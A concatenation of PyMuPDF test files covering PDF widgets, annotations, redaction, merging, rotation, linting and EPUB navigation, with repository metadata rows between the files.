doc.xref_get_key(637, "AS")[1],
doc.xref_get_key(638, "AS")[1],
doc.xref_get_key(127, "V")[1],
)
)
for i, xref in enumerate((635, 636, 637, 638)):
w = page.load_widget(xref)
w.field_value = True
w.update()
assert values() == set(("/Off", f"{i}", f"/{i}"))
w.field_value = False
w.update()
assert values() == set(("Off", "/Off"))
def test_2411():
"""Add combobox values in different formats."""
doc = pymupdf.open()
page = doc.new_page()
rect = pymupdf.Rect(100, 100, 300, 200)
widget = pymupdf.Widget()
widget.field_flags = (
pymupdf.PDF_CH_FIELD_IS_COMBO
| pymupdf.PDF_CH_FIELD_IS_EDIT
| pymupdf.PDF_CH_FIELD_IS_COMMIT_ON_SEL_CHANGE
)
widget.field_name = "ComboBox-1"
widget.field_label = "an editable combo box ..."
widget.field_type = pymupdf.PDF_WIDGET_TYPE_COMBOBOX
widget.fill_color = pymupdf.pdfcolor["gold"]
widget.rect = rect
widget.choice_values = [
["Spain", "ES"], # double value as list
("Italy", "I"), # double value as tuple
"Portugal", # single value
]
page.add_widget(widget)
def test_2391():
"""Confirm that multiple times setting a checkbox to ON/True/Yes will work."""
doc = pymupdf.open(f"{scriptdir}/resources/widgettest.pdf")
page = doc[0]
# its work when we update first-time
for field in page.widgets(types=[pymupdf.PDF_WIDGET_TYPE_CHECKBOX]):
field.field_value = True
field.update()
for i in range(5):
pdfdata = doc.tobytes()
doc.close()
doc = pymupdf.open("pdf", pdfdata)
page = doc[0]
for field in page.widgets(types=[pymupdf.PDF_WIDGET_TYPE_CHECKBOX]):
assert field.field_value == field.on_state()
field_field_value = field.on_state()
field.update()
def test_3216():
document = pymupdf.open(filename)
for page in document:
while 1:
w = page.first_widget
print(f"{w=}")
if not w:
break
page.delete_widget(w)
def test_add_widget():
doc = pymupdf.open()
page = doc.new_page()
w = pymupdf.Widget()
w.field_type = pymupdf.PDF_WIDGET_TYPE_BUTTON
w.rect = pymupdf.Rect(5, 5, 20, 20)
w.field_flags = pymupdf.PDF_BTN_FIELD_IS_PUSHBUTTON
w.field_name = "button"
w.fill_color = (0, 0, 1)
w.script = "app.alert('Hello, PDF!');"
page.add_widget(w)
def test_interfield_calculation():
"""Confirm correct working of interfield calculations.
We are going to create three pages with a computed result field each.
Tests the fix for https://github.com/pymupdf/PyMuPDF/issues/3402.
"""
# Field bboxes (same on each page)
r1 = pymupdf.Rect(100, 100, 300, 120)
r2 = pymupdf.Rect(100, 130, 300, 150)
r3 = pymupdf.Rect(100, 180, 300, 200)
doc = pymupdf.open()
pdf = pymupdf._as_pdf_document(doc) # we need underlying PDF document
# Make PDF name object for "CO" because it is not defined in MuPDF.
CO_name = pymupdf.mupdf.pdf_new_name("CO") # = PDF_NAME(CO)
for i in range(3):
page = doc.new_page()
w = pymupdf.Widget()
w.field_name = f"NUM1{page.number}"
w.rect = r1
w.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
w.field_value = f"{i*100+1}"
w.field_flags = 2
page.add_widget(w)
w = pymupdf.Widget()
w.field_name = f"NUM2{page.number}"
w.rect = r2
w.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
w.field_value = "200"
w.field_flags = 2
page.add_widget(w)
w = pymupdf.Widget()
w.field_name = f"RESULT{page.number}"
w.rect = r3
w.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
w.field_value = "Result?"
# Script that adds previous two fields.
w.script_calc = f"""AFSimple_Calculate("SUM",
new Array("NUM1{page.number}", "NUM2{page.number}"));"""
page.add_widget(w)
# Access the inter-field calculation array. It contains a reference to
# all fields which have a JavaScript stored in their "script_calc"
# property, i.e. an "AA/C" entry.
# Every iteration adds another such field, so this array's length must
# always equal the loop index.
if i == 0: # only need to execute this on first time through
CO = pymupdf.mupdf.pdf_dict_getl(
pymupdf.mupdf.pdf_trailer(pdf),
pymupdf.PDF_NAME("Root"),
pymupdf.PDF_NAME("AcroForm"),
CO_name,
)
# we confirm CO is an array of foreseeable length
assert pymupdf.mupdf.pdf_array_len(CO) == i + 1
# the xref of the i-th item must equal that of the last widget
assert (
pymupdf.mupdf.pdf_to_num(pymupdf.mupdf.pdf_array_get(CO, i))
== list(page.widgets())[-1].xref
)
def test_3950():
path = os.path.normpath(f'{__file__}/../../tests/resources/test_3950.pdf')
items = list()
with pymupdf.open(path) as document:
for page in document:
for widget in page.widgets():
items.append(widget.field_label)
print(f'test_3950(): {widget.field_label=}.')
assert items == [
'{{ named_insured }}',
'{{ policy_period_start_date }}',
'{{ policy_period_end_date }}',
'{{ insurance_line }}',
]
| 10,684 | Python | .py | 294 | 29.530612 | 83 | 0.616084 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,363 | test_remove-rotation.py | pymupdf_PyMuPDF/tests/test_remove-rotation.py | import os
import pymupdf
from gentle_compare import gentle_compare
scriptdir = os.path.dirname(__file__)
def test_remove_rotation():
"""Remove rotation verifying identical appearance and text."""
filename = os.path.join(scriptdir, "resources", "test-2812.pdf")
doc = pymupdf.open(filename)
# We always create fresh pages to avoid false positives from cache content.
# Text on these pages consists of pairwise different strings, sorting by
# these strings must therefore yield identical bounding boxes.
for i in range(1, doc.page_count):
assert doc[i].rotation # must be a rotated page
pix0 = doc[i].get_pixmap() # make image
words0 = []
for w in doc[i].get_text("words"):
words0.append(list(pymupdf.Rect(w[:4]) * doc[i].rotation_matrix) + [w[4]])
words0.sort(key=lambda w: w[4]) # sort by word strings
# derotate page and confirm nothing else has changed
doc[i].remove_rotation()
assert doc[i].rotation == 0
pix1 = doc[i].get_pixmap()
words1 = doc[i].get_text("words")
words1.sort(key=lambda w: w[4]) # sort by word strings
assert pix1.digest == pix0.digest, f"{pix1.digest}/{pix0.digest}"
assert gentle_compare(words0, words1)
| 1,280 | Python | .py | 26 | 42.538462 | 86 | 0.6656 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,364 | test_annots.py | pymupdf_PyMuPDF/tests/test_annots.py | # -*- coding: utf-8 -*-
"""
Test PDF annotation insertions.
"""
import os
import pymupdf
import gentle_compare
pymupdf.TOOLS.set_annot_stem("jorj")
red = (1, 0, 0)
blue = (0, 0, 1)
gold = (1, 1, 0)
green = (0, 1, 0)
scriptdir = os.path.dirname(__file__)
displ = pymupdf.Rect(0, 50, 0, 50)
r = pymupdf.Rect(72, 72, 220, 100)
t1 = "têxt üsès Lätiñ charß,\nEUR: €, mu: µ, super scripts: ²³!"
rect = pymupdf.Rect(100, 100, 200, 200)
def test_caret():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_caret_annot(rect.tl)
assert annot.type == (14, "Caret")
annot.update(rotate=20)
page.annot_names()
page.annot_xrefs()
def test_freetext():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_freetext_annot(
rect,
t1,
fontsize=10,
rotate=90,
text_color=blue,
fill_color=gold,
align=pymupdf.TEXT_ALIGN_CENTER,
)
annot.set_border(width=0.3, dashes=[2])
annot.update(text_color=blue, fill_color=gold)
assert annot.type == (2, "FreeText")
def test_text():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_text_annot(r.tl, t1)
assert annot.type == (0, "Text")
def test_highlight():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_highlight_annot(rect)
assert annot.type == (8, "Highlight")
def test_underline():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_underline_annot(rect)
assert annot.type == (9, "Underline")
def test_squiggly():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_squiggly_annot(rect)
assert annot.type == (10, "Squiggly")
def test_strikeout():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_strikeout_annot(rect)
assert annot.type == (11, "StrikeOut")
page.delete_annot(annot)
def test_polyline():
doc = pymupdf.open()
page = doc.new_page()
rect = page.rect + (100, 36, -100, -36)
cell = pymupdf.make_table(rect, rows=10)
for i in range(10):
annot = page.add_polyline_annot((cell[i][0].bl, cell[i][0].br))
annot.set_line_ends(i, i)
annot.update()
for i, annot in enumerate(page.annots()):
assert annot.line_ends == (i, i)
assert annot.type == (7, "PolyLine")
def test_polygon():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_polygon_annot([rect.bl, rect.tr, rect.br, rect.tl])
assert annot.type == (6, "Polygon")
def test_line():
doc = pymupdf.open()
page = doc.new_page()
rect = page.rect + (100, 36, -100, -36)
cell = pymupdf.make_table(rect, rows=10)
for i in range(10):
annot = page.add_line_annot(cell[i][0].bl, cell[i][0].br)
annot.set_line_ends(i, i)
annot.update()
for i, annot in enumerate(page.annots()):
assert annot.line_ends == (i, i)
assert annot.type == (3, "Line")
def test_square():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_rect_annot(rect)
assert annot.type == (4, "Square")
def test_circle():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_circle_annot(rect)
assert annot.type == (5, "Circle")
def test_fileattachment():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_file_annot(rect.tl, b"just anything for testing", "testdata.txt")
assert annot.type == (17, "FileAttachment")
def test_stamp():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_stamp_annot(r, stamp=10)
assert annot.type == (13, "Stamp")
annot_id = annot.info["id"]
annot_xref = annot.xref
page.load_annot(annot_id)
page.load_annot(annot_xref)
page = doc.reload_page(page)
def test_redact1():
doc = pymupdf.open()
page = doc.new_page()
annot = page.add_redact_annot(r, text="Hello")
annot.update(
cross_out=True,
rotate=-1,
)
assert annot.type == (12, "Redact")
annot.get_pixmap()
info = annot.info
annot.set_info(info)
assert not annot.has_popup
annot.set_popup(r)
s = annot.popup_rect
assert s == r
page.apply_redactions()
def test_redact2():
"""Test for keeping text and removing graphics."""
if not hasattr(pymupdf, "mupdf"):
print("Not executing 'test_redact2' in classic")
return
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
doc = pymupdf.open(filename)
page = doc[0]
all_text0 = page.get_text("words")
page.add_redact_annot(page.rect)
page.apply_redactions(text=1)
t = page.get_text("words")
if pymupdf.mupdf_version_tuple < (1, 24, 2):
assert t == []
else:
assert t == all_text0
assert not page.get_drawings()
def test_redact3():
"""Test for removing text and graphics."""
if not hasattr(pymupdf, "mupdf"):
print("Not executing 'test_redact3' in classic")
return
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
doc = pymupdf.open(filename)
page = doc[0]
page.add_redact_annot(page.rect)
page.apply_redactions()
assert not page.get_text("words")
assert not page.get_drawings()
def test_redact4():
"""Test for removing text and keeping graphics."""
if not hasattr(pymupdf, "mupdf"):
print("Not executing 'test_redact4' in classic")
return
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
doc = pymupdf.open(filename)
page = doc[0]
line_art = page.get_drawings()
page.add_redact_annot(page.rect)
page.apply_redactions(graphics=0)
assert not page.get_text("words")
assert line_art == page.get_drawings()
def test_1645():
'''
Test fix for #1645.
'''
path_in = os.path.abspath( f'{__file__}/../resources/symbol-list.pdf')
if pymupdf.mupdf_version_tuple >= (1, 25):
path_expected = os.path.abspath( f'{__file__}/../../tests/resources/test_1645_expected_1.25.pdf')
elif pymupdf.mupdf_version_tuple >= (1, 24, 2):
path_expected = os.path.abspath( f'{__file__}/../../tests/resources/test_1645_expected_1.24.2.pdf')
elif pymupdf.mupdf_version_tuple >= (1, 24):
path_expected = os.path.abspath( f'{__file__}/../../tests/resources/test_1645_expected_1.24.pdf')
else:
path_expected = os.path.abspath( f'{__file__}/../resources/test_1645_expected_1.22.pdf')
path_out = os.path.abspath( f'{__file__}/../test_1645_out.pdf')
doc = pymupdf.open(path_in)
page = doc[0]
page_bounds = page.bound()
annot_loc = pymupdf.Rect(page_bounds.x0, page_bounds.y0, page_bounds.x0 + 75, page_bounds.y0 + 15)
# Check type of page.derotation_matrix - this is #2911.
assert isinstance(page.derotation_matrix, pymupdf.Matrix), \
f'Bad type for page.derotation_matrix: {type(page.derotation_matrix)=} {page.derotation_matrix=}.'
page.add_freetext_annot(
annot_loc * page.derotation_matrix,
"TEST",
fontsize=18,
fill_color=pymupdf.utils.getColor("FIREBRICK1"),
rotate=page.rotation,
)
doc.save(path_out, garbage=1, deflate=True, no_new_id=True)
print(f'Have created {path_out}. comparing with {path_expected}.')
with open( path_out, 'rb') as f:
out = f.read()
with open( path_expected, 'rb') as f:
expected = f.read()
assert out == expected, f'Files differ: {path_out} {path_expected}'
def test_1824():
'''
Test for fix for #1824: SegFault when applying redactions overlapping a
transparent image.
'''
path = os.path.abspath( f'{__file__}/../resources/test_1824.pdf')
doc=pymupdf.open(path)
page=doc[0]
page.apply_redactions()
def test_2270():
'''
https://github.com/pymupdf/PyMuPDF/issues/2270
'''
path = os.path.abspath( f'{__file__}/../../tests/resources/test_2270.pdf')
with pymupdf.open(path) as document:
for page_number, page in enumerate(document):
for textBox in page.annots(types=(pymupdf.PDF_ANNOT_FREE_TEXT,pymupdf.PDF_ANNOT_TEXT)):
print("textBox.type :", textBox.type)
print("textBox.get_text('words') : ", textBox.get_text('words'))
print("textBox.get_text('text') : ", textBox.get_text('text'))
print("textBox.get_textbox(textBox.rect) : ", textBox.get_textbox(textBox.rect))
print("textBox.info['content'] : ", textBox.info['content'])
assert textBox.type == (2, 'FreeText')
assert textBox.get_text('words')[0][4] == 'abc123'
assert textBox.get_text('text') == 'abc123\n'
assert textBox.get_textbox(textBox.rect) == 'abc123'
assert textBox.info['content'] == 'abc123'
if hasattr(pymupdf, 'mupdf'):
# Additional check that Annot.get_textpage() returns a
# TextPage that works with page.get_text() - prior to
# 2024-01-30 the TextPage had no `.parent` member.
textpage = textBox.get_textpage()
text = page.get_text()
print(f'{text=}')
text = page.get_text(textpage=textpage)
print(f'{text=}')
print(f'{getattr(textpage, "parent")=}')
def test_2934_add_redact_annot():
'''
Test fix for bug mentioned in #2934.
'''
path = os.path.abspath(f'{__file__}/../../tests/resources/mupdf_explored.pdf')
with open(path, 'rb') as f:
data = f.read()
doc = pymupdf.Document(stream=data)
print(f'Is PDF: {doc.is_pdf}')
print(f'Number of pages: {doc.page_count}')
import json
page=doc[0]
page_json_str =doc[0].get_text("json")
page_json_data = json.loads(page_json_str)
span=page_json_data.get("blocks")[0].get("lines")[0].get("spans")[0]
page.add_redact_annot(span["bbox"], text="")
page.apply_redactions()
def test_2969():
'''
https://github.com/pymupdf/PyMuPDF/issues/2969
'''
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2969.pdf')
doc = pymupdf.open(path)
page = doc[0]
first_annot = list(page.annots())[0]
first_annot.next
def test_file_info():
path = os.path.abspath(f'{__file__}/../../tests/resources/test_annot_file_info.pdf')
document = pymupdf.open(path)
results = list()
for i, page in enumerate(document):
print(f'{i=}')
annotations = page.annots()
for j, annotation in enumerate(annotations):
print(f'{j=} {annotation=}')
t = annotation.type
print(f'{t=}')
if t[0] == pymupdf.PDF_ANNOT_FILE_ATTACHMENT:
file_info = annotation.file_info
print(f'{file_info=}')
results.append(file_info)
assert results == [
{'filename': 'example.pdf', 'descender': '', 'length': 8416, 'size': 8992},
{'filename': 'photo1.jpeg', 'descender': '', 'length': 10154, 'size': 8012},
]
def test_3131():
doc = pymupdf.open()
page = doc.new_page()
page.add_line_annot((0, 0), (1, 1))
page.add_line_annot((1, 0), (0, 1))
first_annot, _ = page.annots()
first_annot.next.type
def test_3209():
pdf = pymupdf.Document(filetype="pdf")
page = pdf.new_page()
page.add_ink_annot([[(300,300), (400, 380), (350, 350)]])
n = 0
for annot in page.annots():
n += 1
assert annot.vertices == [[(300.0, 300.0), (400.0, 380.0), (350.0, 350.0)]]
assert n == 1
path = os.path.abspath(f'{__file__}/../../tests/test_3209_out.pdf')
pdf.save(path) # Check the output PDF that the annotation is correctly drawn
def test_3863():
if pymupdf.mupdf_version_tuple < (1, 24, 10):
print(f'test_3863(): not running because {pymupdf.mupdf_version_tuple=} < 1.24.10.')
return
path_in = os.path.normpath(f'{__file__}/../../tests/resources/test_3863.pdf')
path_out = os.path.normpath(f'{__file__}/../../tests/test_3863.pdf.pdf')
# Create redacted PDF.
print(f'Loading {path_in=}.')
with pymupdf.open(path_in) as document:
for num, page in enumerate(document):
print(f"Page {num + 1} - {page.rect}:")
for image in page.get_images(full=True):
print(f" - Image: {image}")
redact_rect = page.rect
if page.rotation in (90, 270):
redact_rect = pymupdf.Rect(0, 0, page.rect.height, page.rect.width)
page.add_redact_annot(redact_rect)
page.apply_redactions(images=pymupdf.PDF_REDACT_IMAGE_NONE)
print(f'Writing to {path_out=}.')
document.save(path_out)
with pymupdf.open(path_out) as document:
assert len(document) == 8
# Create PNG for each page of redacted PDF.
for num, page in enumerate(document):
path_png = f'{path_out}.{num}.png'
pixmap = page.get_pixmap()
print(f'Writing to {path_png=}.')
pixmap.save(path_png)
# Compare with expected png.
print(f'Comparing page PNGs with expected PNGs.')
for num, _ in enumerate(document):
path_png = f'{path_out}.{num}.png'
path_png_expected = f'{path_in}.pdf.{num}.png'
print(f'{path_png=}.')
print(f'{path_png_expected=}.')
rms = gentle_compare.pixmaps_rms(path_png, path_png_expected, ' ')
# We get small differences in sysinstall tests, where some
# thirdparty libraries can differ.
assert rms < 1
| 13,734 | Python | .py | 353 | 31.824363 | 110 | 0.604371 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,365 | test_balance_count.py | pymupdf_PyMuPDF/tests/test_balance_count.py | import pymupdf
def test_q_count():
"""Testing graphics state balances and wrap_contents().
Take page's contents and generate various imbalanced graphics state
situations. Each time compare q-count with expected results.
Finally confirm we are out of balance using "is_wrapped", wrap the
contents object(s) via "wrap_contents()" and confirm success.
PDF commands "q" / "Q" stand for "push", respectively "pop".
"""
doc = pymupdf.open()
page = doc.new_page()
# the page has no /Contents objects at all yet. Create one causing
# an initial imbalance (so prepended "q" is needed)
pymupdf.TOOLS._insert_contents(page, b"Q", True) # append
assert page._count_q_balance() == (1, 0)
assert page.is_wrapped is False
# Prepend more data that yield a different type of imbalanced contents:
# Although counts of q and Q are equal now, the unshielded 'cm' before
# the first 'q' makes the contents unusable for insertions.
pymupdf.TOOLS._insert_contents(page, b"1 0 0 -1 0 0 cm q ", False) # prepend
if pymupdf.mupdf_version_tuple >= (1, 24, 2):
assert page.is_wrapped is False
else:
assert page.is_wrapped
if page._count_q_balance() == (0, 0):
print("imbalance undetected by q balance count")
text = "Hello, World!"
page.insert_text((100, 100), text) # establishes balance!
# this should have produced a balanced graphics state
assert page._count_q_balance() == (0, 0)
assert page.is_wrapped
# an appended "pop" must be balanced by a prepended "push"
pymupdf.TOOLS._insert_contents(page, b"Q", True) # append
assert page._count_q_balance() == (1, 0)
# a prepended "pop" yet needs another push
pymupdf.TOOLS._insert_contents(page, b"Q", False) # prepend
assert page._count_q_balance() == (2, 0)
# an appended "push" needs an additional "pop"
pymupdf.TOOLS._insert_contents(page, b"q", True) # append
assert page._count_q_balance() == (2, 1)
# wrapping the contents should yield a balanced state again
assert page.is_wrapped is False
page.wrap_contents()
assert page.is_wrapped is True
assert page._count_q_balance() == (0, 0)
| 2,213 | Python | .py | 45 | 43.866667 | 81 | 0.68165 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,366 | test_insertpdf.py | pymupdf_PyMuPDF/tests/test_insertpdf.py | """
* Join multiple PDFs into a new one.
* Compare with stored earlier result:
- must have identical object definitions
- must have different trailers
* Try inserting files in a loop.
"""
import io
import os
import re
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
resources = os.path.join(scriptdir, "resources")
def approx_parse( text):
'''
Splits <text> into sequence of (text, number) pairs. Where sequence of
[0-9.] is not convertible to a number (e.g. '4.5.6'), <number> will be
None.
'''
ret = []
for m in re.finditer('([^0-9]+)([0-9.]*)', text):
text = m.group(1)
try:
number = float( m.group(2))
except Exception:
text += m.group(2)
number = None
ret.append( (text, number))
return ret
def approx_compare( a, b, max_delta):
'''
Compares <a> and <b>, allowing numbers to differ by up to <delta>.
'''
aa = approx_parse( a)
bb = approx_parse( b)
if len(aa) != len(bb):
return 1
ret = 1
for (at, an), (bt, bn) in zip( aa, bb):
if at != bt:
break
if an is not None and bn is not None:
if abs( an - bn) >= max_delta:
print( f'diff={an-bn}: an={an} bn={bn}')
break
elif (an is None) != (bn is None):
break
else:
ret = 0
if ret:
print( f'Differ:\n a={a!r}\n b={b!r}')
return ret
def test_insert():
all_text_original = [] # text on input pages
all_text_combined = [] # text on resulting output pages
# prepare input PDFs
doc1 = pymupdf.open()
for i in range(5): # just arbitrary number of pages
text = f"doc 1, page {i}" # the 'globally' unique text
page = doc1.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
doc2 = pymupdf.open()
for i in range(4):
text = f"doc 2, page {i}"
page = doc2.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
doc3 = pymupdf.open()
for i in range(3):
text = f"doc 3, page {i}"
page = doc3.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
doc4 = pymupdf.open()
for i in range(6):
text = f"doc 4, page {i}"
page = doc4.new_page()
page.insert_text((100, 72), text)
all_text_original.append(text)
new_doc = pymupdf.open() # make combined PDF of input files
new_doc.insert_pdf(doc1)
new_doc.insert_pdf(doc2)
new_doc.insert_pdf(doc3)
new_doc.insert_pdf(doc4)
# read text from all pages and store in list
for page in new_doc:
all_text_combined.append(page.get_text().replace("\n", ""))
# the lists must be equal
assert all_text_combined == all_text_original
def test_issue1417_insertpdf_in_loop():
"""Using a context manager instead of explicitly closing files"""
f = os.path.join(resources, "1.pdf")
big_doc = pymupdf.open()
fd1 = os.open( f, os.O_RDONLY)
os.close( fd1)
for n in range(0, 1025):
with pymupdf.open(f) as pdf:
big_doc.insert_pdf(pdf)
# Create a raw file descriptor. If the above pymupdf.open() context leaks
# a file descriptor, fd will be seen to increment.
fd2 = os.open( f, os.O_RDONLY)
assert fd2 == fd1
os.close( fd2)
big_doc.close()
def _test_insert_adobe():
path = os.path.abspath( f'{__file__}/../../../PyMuPDF-performance/adobe.pdf')
if not os.path.exists(path):
print(f'Not running test_insert_adobe() because does not exist: {os.path.relpath(path)}')
return
a = pymupdf.Document()
b = pymupdf.Document(path)
a.insert_pdf(b)
def _2861_2871_merge_pdf(content: bytes, coverpage: bytes):
with pymupdf.Document(stream=coverpage, filetype="pdf") as coverpage_pdf:
with pymupdf.Document(stream=content, filetype="pdf") as content_pdf:
coverpage_pdf.insert_pdf(content_pdf)
doc = coverpage_pdf.write()
return doc
def test_2861():
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2861.pdf')
with open(path, "rb") as content_pdf:
with open(path, "rb") as coverpage_pdf:
content = content_pdf.read()
coverpage = coverpage_pdf.read()
_2861_2871_merge_pdf(content, coverpage)
def test_2871():
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2871.pdf')
with open(path, "rb") as content_pdf:
with open(path, "rb") as coverpage_pdf:
content = content_pdf.read()
coverpage = coverpage_pdf.read()
_2861_2871_merge_pdf(content, coverpage)
def test_3789():
file_path = os.path.abspath(f'{__file__}/../../tests/resources/test_3789.pdf')
result_path = os.path.abspath(f'{__file__}/../../tests/test_3789_out')
pages_per_split = 5
# Clean pdf
doc = pymupdf.open(file_path)
tmp = io.BytesIO()
tmp.write(doc.write(garbage=4, deflate=True))
source_doc = pymupdf.Document('pdf', tmp.getvalue())
tmp.close()
# Calculate the number of pages per split file and the number of split files
page_range = pages_per_split - 1
split_range = range(0, source_doc.page_count, pages_per_split)
num_splits = len(split_range)
# Loop through each split range and create a new PDF file
for i, start in enumerate(split_range):
output_doc = pymupdf.open()
# Determine the ending page for this split file
to_page = start + page_range if i < num_splits - 1 else -1
output_doc.insert_pdf(source_doc, from_page=start, to_page=to_page)
# Save the output document to a file and add the path to the list of split files
path = f'{result_path}_{i}.pdf'
output_doc.save(path, garbage=2)
print(f'Have saved to {path=}.')
# If this is the last split file, exit the loop
if to_page == -1:
break
| 6,088 | Python | .py | 160 | 31.04375 | 97 | 0.607483 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,367 | test_flake8.py | pymupdf_PyMuPDF/tests/test_flake8.py | import pymupdf
import os
import subprocess
import sys
def test_flake8():
'''
Check rebased Python code with flake8.
'''
if not hasattr(pymupdf, 'mupdf'):
print(f'Not running flake8 with classic implementation.')
return
ignores = (
'E123', # closing bracket does not match indentation of opening bracket's line
'E124', # closing bracket does not match visual indentation
'E126', # continuation line over-indented for hanging indent
'E127', # continuation line over-indented for visual indent
'E128', # continuation line under-indented for visual indent
'E131', # continuation line unaligned for hanging indent
'E201', # whitespace after '('
'E203', # whitespace before ':'
'E221', # E221 multiple spaces before operator
'E225', # missing whitespace around operator
'E226', # missing whitespace around arithmetic operator
'E231', # missing whitespace after ','
'E241', # multiple spaces after ':'
'E251', # unexpected spaces around keyword / parameter equals
'E252', # missing whitespace around parameter equals
'E261', # at least two spaces before inline comment
'E265', # block comment should start with '# '
'E271', # multiple spaces after keyword
'E272', # multiple spaces before keyword
'E302', # expected 2 blank lines, found 1
'E305', # expected 2 blank lines after class or function definition, found 1
'E306', # expected 1 blank line before a nested definition, found 0
'E402', # module level import not at top of file
'E501', # line too long (80 > 79 characters)
'E701', # multiple statements on one line (colon)
'E741', # ambiguous variable name 'l'
'F541', # f-string is missing placeholders
'W293', # blank line contains whitespace
'W503', # line break before binary operator
'W504', # line break after binary operator
'E731', # do not assign a lambda expression, use a def
)
ignores = ','.join(ignores)
root = os.path.abspath(f'{__file__}/../..')
def run(command):
print(f'test_flake8(): Running: {command}')
subprocess.run(command, shell=1, check=1)
run(f'flake8 --ignore={ignores} --statistics {root}/src/__init__.py {root}/src/utils.py {root}/src/table.py')
print(f'test_flake8(): flake8 succeeded.')
| 2,575 | Python | .py | 51 | 40.490196 | 113 | 0.614439 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,368 | test_2548.py | pymupdf_PyMuPDF/tests/test_2548.py | import os
import pymupdf
root = os.path.abspath(f'{__file__}/../..')
def test_2548():
"""Text extraction should fail because of PDF structure cycle.
Old MuPDF version did not detect the loop.
"""
print(f'test_2548(): {pymupdf.mupdf_version_tuple=}')
if pymupdf.mupdf_version_tuple < (1, 23, 4):
print(f'test_2548(): Not testing #2548 because infinite hang before mupdf-1.23.4.')
return
pymupdf.TOOLS.mupdf_warnings(reset=True)
doc = pymupdf.open(f'{root}/tests/resources/test_2548.pdf')
e = False
for page in doc:
try:
_ = page.get_text()
except Exception as ee:
print(f'test_2548: {ee=}')
if hasattr(pymupdf, 'mupdf'):
# Rebased.
expected = "RuntimeError('code=2: cycle in structure tree')"
else:
# Classic.
expected = "RuntimeError('cycle in structure tree')"
assert repr(ee) == expected, f'Expected {expected=} but got {repr(ee)=}.'
e = True
wt = pymupdf.TOOLS.mupdf_warnings()
print(f'test_2548(): {wt=}')
# This checks that PyMuPDF 1.23.7 fixes this bug, and also that earlier
# versions with updated MuPDF also fix the bug.
rebased = hasattr(pymupdf, 'mupdf')
if pymupdf.mupdf_version_tuple >= (1, 23, 7):
if pymupdf.mupdf_version_tuple >= (1, 25):
expected = 'format error: cycle in structure tree\nstructure tree broken, assume tree is missing'
elif pymupdf.mupdf_version_tuple >= (1, 24):
expected = 'Loop found in structure tree. Ignoring structure.'
else:
expected = 'structure tree broken, assume tree is missing: cycle in structure tree'
if rebased:
assert wt == expected, f'expected:\n {expected!r}\nwt:\n {wt!r}\n'
assert not e
else:
assert e
if rebased:
assert not wt
| 1,947 | Python | .py | 46 | 33.565217 | 109 | 0.600211 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,369 | test_nonpdf.py | pymupdf_PyMuPDF/tests/test_nonpdf.py | """
* Check EPUB document is no PDF
* Check page access using (chapter, page) notation
* Re-layout EPUB ensuring a previous location is memorized
"""
import os
import pymupdf
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "Bezier.epub")
doc = pymupdf.open(filename)
def test_isnopdf():
assert not doc.is_pdf
def test_pageids():
assert doc.chapter_count == 7
assert doc.last_location == (6, 1)
assert doc.prev_location((6, 0)) == (5, 11)
assert doc.next_location((5, 11)) == (6, 0)
# Check page numbers have no gaps:
i = 0
for chapter in range(doc.chapter_count):
for cpno in range(doc.chapter_page_count(chapter)):
assert doc.page_number_from_location((chapter, cpno)) == i
i += 1
def test_layout():
"""Memorize a page location, re-layout with ISO-A4, assert pre-determined location."""
loc = doc.make_bookmark((5, 11))
doc.layout(pymupdf.Rect(pymupdf.paper_rect("a4")))
assert doc.find_bookmark(loc) == (5, 6)
| 1,054 | Python | .py | 28 | 33.535714 | 90 | 0.676153 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,370 | test_pagedelete.py | pymupdf_PyMuPDF/tests/test_pagedelete.py | """
----------------------------------------------------
This tests correct functioning of multi-page delete
----------------------------------------------------
Create a PDF in memory with 100 pages with a unique text each.
Also create a TOC with a bookmark per page.
On every page after the first to-be-deleted page, also insert a link, which
points to this page.
The bookmark text equals the text on the page for easy verification.
Then delete some pages and verify:
- the new TOC has empty items exactly for every deleted page
- the remaining TOC items still point to the correct page
- the document has no more links at all
"""
import os
import pymupdf
scriptdir = os.path.dirname(__file__)
page_count = 100 # initial document length
r = range(5, 35, 5) # contains page numbers we will delete
